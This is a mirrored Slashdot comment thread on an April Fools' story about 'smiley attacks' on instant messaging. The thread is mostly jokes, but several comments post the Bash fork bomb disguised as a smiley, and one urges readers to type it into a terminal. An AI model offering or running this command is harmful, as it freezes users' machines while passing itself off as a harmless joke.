Slashdot Mirror
Instant Messaging Vulnerable To New Smiley Attacks
titus writes "Security researchers Yoann Guillot and Julien Tinnes have found a way to encode malicious code into smileys and provided a proof of concept encoder to automate the process. The researchers said their discovery paves the way for IM malware that would be impossible to detect since the malicious code would be 'indistinguishable from genuine chat messages.' I've tested the proof of concept code which works very well. Time to panic?"
Uh-oh, I knew all those 14 year old girls were really 1337 ha>0rz...
And that! :-) (-:
Palm trees and 8
which is safer?
; ) .... now u r mine
:P pwned! :D
..effing funny. You guys should be on stage in Vegas or something.
Are YOU using the TOOL, or is the TOOL using YOU? Think about it!
This is why I've disabled my smilies and only post mine backwards so they don't get parsed. I don't want to be considered a hacker... (-:
this is one of the funniest I have heard today, along with the squeeze bacon from thinkgeek
A Smith & Wesson beats four aces -- Murphy's Law of Poker
I can't decide if I should even give a shit. Smileys deserve to be filled with a viral infection. Happy little fuckers.
Why is it so hard to only have politicians for a few years, then have them go away?
I knew that frowny face was out to get me!
For the love of all that's decent, make it stop!
Publishing these holes only encourages further malicious activity!
Smiles are contagious.
Dual Opteron < $600
...the quarterback is toast. :) :) :) :)
PWN3D!
I'm not cool enough to have a
So now I've gotta disinfect my women and my smileys...a pox on you all!
fuxx0ring your computerz.
I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
Please? OK? One or two stories is acceptable, even if they are not funny. Multiple stories each year is just annoying.
How about you just turn off those annoying smiles then? Problem solved?
I prefer text based emoticons anyway :p
*DrugCheese rants*
Smiley Already Used as Harbinger of Doom http://www.socuteurl.com/waddlypuppet
"I believe in Karma. That means I can do bad things to people all day long and I assume they deserve it." : Dogbert
As I understand it, there is already a variant out undetectable to anti-smiley software as it embeds itself in a frowny-face.
I wonder if it's transmittable on a discussion board as well? :(
JUST DO IT
"Why so serious?"
:-() (==========B And let that be a lesson to you
"Slashdot Is Broken Day!"
Oh please, please someone post a release date for Duke Nukem Forever! Or a story about how Microsoft is publishing their source code base under the GPL.
IT'S NOT TIRED AND BORING AT ALL.
Weaselmancer
rediculous.
\(^-^)/ ...stupid filter
Ack! Now I'm :-) infected. How could :-) you go posting :-) such a virulent :-) virus where :-) everyone could see i:-)t? I thin:-)k th:-)e inf:-)ect:-)ion's g:-)et:-)tin:-)g wo:-)rs:-)e n:-)o:-)w. I:-)'m of:-)f t:-)o pa:-)t:-)ch:-) m:-)y s:-)ys:-)te:-)m. :-):-):-):-):-)
My sci-fi novel, Ghost Thief, is now available from Amazon.com.
I've always thought that it would be far more fun to get into someone's system (actually, lots of people's systems) and replace the smiley images. You send :) and, instead of getting a smiley face, they see an image that contains a sexually explicit proposition in the default MSN font. Imagine the chaos.
Fortunately for the world, I can't write viruses. :D
this crap is just getting old.
:(){ :|:& };:
There, punch that into your terminal and see the poweer of the smiley.
Is it sad that I am more likely to recognize you and your posts by your sig than your name or UID?
8===D
It always leads to trouble.
I received this in a bugtraq message earlier and just ignored it, thinking huh, I should read that later. Having read it here I went back and checked it out in full. Did anyone actually run the Ruby code attached to the blog/bugtraq?
Creationist Textbook Stickers Declared Unconstitutional by CowboyNeal
8===D
You ONLY publish April Fools' news!
I was reading through the main page thinking what the hell.
...is that some of the real stories are less plausible.
Genesis 1:32 And God typed
(o)(o) - here's a vulnerability encoded in bewbs.
I would have more examples but Slashdot refuses to render characters in a fixed-width fashion, foiling any further attempts at character art jokes.
Kwisatz Haderach
Sell the spice to CHOAM
This Mahdi took Shaddam's Throne
That's nothing, I can insert malicious code into the space between those smileys.
http://xkcd.com/380/
Did you mount a military-grade, variable-focus MASER on an unlicensed artificial intelligence?
Σ(ï¾YÐ"ï¾Y)
8-------> ( ! )
this is just g:Pting god d:-)m rediclo:)!
sigs... don't talk to me about sigs....
i think it would be pretty awesome if all those people who can't use their native language well enough to express their mood/feelings with words would just magically go offline ... that would be a great day!
Ah, the Smiley of Death! Long time no see.
Yes, I have seen people reboot their PC because of him, tho I tend to use the less virulent :(){:|:};: on the innocent, as it gives them a sporting chance of stopping it...
But who's innocent these days? MWUAHAHA! :(){:|:&:}:&: !!!
...if one of these hard to believe, so obviously April Fools stories actually turned out to be true. That would have been the *real* April Fools in a really good style. An artfully crafted provocation, made to look stupid and be almost unbelievable... everybody takes it for another lame joke -- and then... tada! April Fools! Your computer actually was compromised by a malicious smiley.
Because until now, the April Fools day on slashdot is ...sad.
j.
:O
Will you please stop this now?
I have moderator points pending. Is there a way to moderate a submitted story as "unfunny"?
j.
Slashdot vulnerable to lame April Fools' jokes! Cease using immediately for at least 24 hours.
This message brought to you by the Association of Simpleminded Slashdot Humor Adversion Team
So...
Does it work in Australia?
I'm paranoid, as my idea of a good AFJ would be publishing genuinely malicious code as joke malicious code.
- fader
ARE you STUPID or waht?
DO YOU THINK THIS IS FUNNY ?
do you even HAVS A BRAIN ?
Why don't you just stop posting here right now like forever and evr ?
I'm getting really bored at all these silly April 1st stories.
I think for a little excitement I should go and punch Cowboy Neal in the face and kick him in the nutsack too.
Now don't you think that would be funny?
Fortunately (-: reverses the :-) infection. (-:
The trick is getting the infectious smilies and disinfecting smilies into perfect balance. McAfee and Symantec will have products available for that shortly, sure to take your smile away when you pay them for the anti-smile software.
Saskboy's blog is good. 9 out of 10 dentists agree.
Regardless of it being a harmless April fools joke, Symantec is probably all ready working on a "Smiley Face Blocker".... And people will buy it...
ObBash
One, if really necessary 2 subtle jokes are fine but this bombardement of nonsense is just annoying.
Those "jokes" are so obvious, it's not even remotely entertaining.
I don't want to be in your contact list...
Oh April's fool! I get it! Is this supposed to be a joke? I'd stay with the lynx text browser....
you have to look at the mouseover text:
"U+FDD0 is actually Unicode for eye of the basilisk, though for safety reasons no font actually renders it."
On a similar note, take this!
][>:=~+
http://www.smbc-comics.com/index.php?db=comics&id=177
Its just time to turn off smileys with that nice little checkbox most IMs have these days. smileys are a dumb misnomer anyway. a yellow face w/ a middle finger in the air is not smiley at all
Don't worry about your data, be :)
You go typing: "I 3 you" and norton pops up... the horror, the horror...
-- Por mais que eu ande no vale das trevas e da morte, meu PowerMac G4 Não Travará!!!
This asdfhsdhafiihueaein,,zuew and (.Y.) --that really aren't different. I guess I don't get how the smileys make a differences or why I can't just send my malicious messages with plain alphanumeric, or gasp! scripts, ie Japanese written word.
*grin*
It's old. The more humans I meet, the more I like my cats. At least they are honest.
g.d. april 1 aint over fast enough
So it isn't a joke.
April fools day finished eight and a half hours ago in the real world (Australia) and even earlier for New Zealand, Tahiti, Fiji etc
And something similar for Japan, China, Korea, All south East Asia and the list goes on.
"I fucked all your mothers" declared Louis CK during one of his stand-up routines.
True story.
"The agriculture ministry is not in charge of Gundam" - Japanese ministry official.
You can use a good programming editor when posting, something with syntax highlighting and parensbcwsmilies matching to keep your smilies properly balanced.
I guess the way the infection works is you put so many smilies to make the message look like some sort of lisp code. The IM software gets confused, starts a lisp interpreter to make some sense of it, the unbalanced parenthesis cause a buffer overflow in the parser, ...
AccountKiller
...in reality there are 3rd party smiley add-ons that work with IM software. You can recognize them by the "Your buddy sent you a smiley, to see it you need to install X software" type of IMs.
That software is not exactly good for your computer either.
For example: http://emoticons.smileycentral.com/yahoo-smileys.jsp
And its EULA http://helpint.mywebsearch.com/intlinfo/eula/eula.jhtml
Choice quotes from EULA
UNIFIED REGISTRATION: As a service to our users, we may consolidate registration data for Webfetti, My Fun Cards, Kazulah, Smiley Central and certain other specified websites, services or applications accessible via the Toolbar, so that users are only required to provide registration information once, and would then be able to use the same unique ID and password to access all such websites, services or applications.
Passwords. In order to access certain services, you may be required to accept additional terms and conditions and/or establish an account including an unique ID and password
After reading that EULA, which references a bunch of other EULAs... that's enough to send my head spinning.
Leonid S. Knyshov
Find me on Quora
That's it. Hand in your card at the door.
Revocation due to non-recognition of a fork bomb on sight.
OpenBSD and Solaris survive, linux fag.
IT'S NOT TIRED AND BORING AT ALL.
What's tired and boring are people with no lives like you who don't want to be here and yet come along to post. And the idiot mods who modded you up for that.
It's fine that you think it's dumb. That's your prerogative. So you can't quit slashdot for A DAY?
I enjoyed this years' stories. I thought some of them were quite funny, as are the posts (except for people like you). You may think that makes me an idiot, and again, you're entitled to your opinion. But do you go around to every website on the internet that you think is stupid to post how stupid you think it is?
On second thought, you should do that. The internet is a big place, and if that task keeps you busy and away from here, we both win.
This is not a hoax, this is real you guys... I'm cereal!
Bow before me, for I am root.
Gahh!
Wouldn't you know, I switch to Lynx to avoid getting goatse'd and RickRolled...and what do you do? ASCI goatse!!
You're despicable, evil, and talented!
Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
Any guesses as to how many newb-owned computers he just hosed?
I stared at the PoC and the outputs wondering how the fuck they thought this was supposed to actually be run by the target, before remembering what day it was.
You forking bastard!
This is what entropy is for.
that wasn't fun at all. I had to restart my computer. I specifically got ubuntu windows instead of microsoft because of this kind of crap!
that wasn't fun at all. I had to restart my computer. I specifically got ubuntu windows instead of microsoft because of this kind of crap!
You ever see that old yarn about a linux virus? Please copy and paste this... blah blah blah?
Is it sad that I am more likely to recognize you and your posts by your sig than your name or UID?
Do you know what's absolutely hilarious? You reading slashdot on april fools and posting about how much you hate it. I mean, you, the person who posted this.
What's the matter? Can't follow your own advice? You know the type of stories you can expect here today, and if you've forgotten what day it was, you were quickly reminded once you first saw these stories. Instead you felt the need to click on "read more" on one of those hated unfunny stories, and post about how bad everything is. Then you came back, and felt like replying to the other dude. Imagine what else you could have done with that time :)
:(){ :|:& };:
YAY!
why should this be allowed to kill a workstation?
Looks like your grammar was infected as well.
Seeing this article, made me think of the XKCD post about how the guy won't get back in bed with his girlfriend because "Someone is wrong on the internet!"
I couldn't avoid reading this even though "That's not how it works... GAH!"
Gravity Sucks
"infection's" being short for "infection is"? How is that wrong?
SIG FAULT: Post index out of bounds.
Oh, right. My bad. Damn smilies.
This is not new.
Everybody knows that smiles are contagious.